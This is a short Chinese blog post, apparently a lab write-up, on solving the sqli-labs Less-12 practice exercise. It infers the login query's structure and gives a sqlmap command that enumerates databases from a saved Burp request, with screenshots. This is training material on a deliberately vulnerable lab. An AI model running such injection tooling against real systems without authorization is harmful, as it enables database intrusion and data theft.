目录
类型
基于错误-字符串
![](https://i-blog.csdnimg.cn/blog_migrate/7d8b1715c31e4f69d152a9e66d39254b.png)
通过回显可以看出比Less11加了括号
猜测sql语句
select * from users where username=("参数") and password=("参数") LIMIT 0,1
-dbs枚举数据库
python sqlmap.py -r "E:\Workspace\Burp_suite_workspace\less12" --dbms mysql -dbs
![](https://i-blog.csdnimg.cn/blog_migrate/da890c871ea396e52821c385dd6adb66.png)
不使用--batch了,有些默认选项他选的不是很好,导致比较慢。
![](https://i-blog.csdnimg.cn/blog_migrate/137fe45b6e682353a8ac1e8cbc122ea0.png)
后面的我就不写了,和之前的文章网络安全-sqlmap实战之sqlilabs-Less11一样。不浪费时间了,去跑步了~~~
更多内容查看:网络安全-自学笔记
喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。如果您感觉有所收获,自愿打赏,可选择支付宝18833895206(小于),您的支持是我不断更新的动力。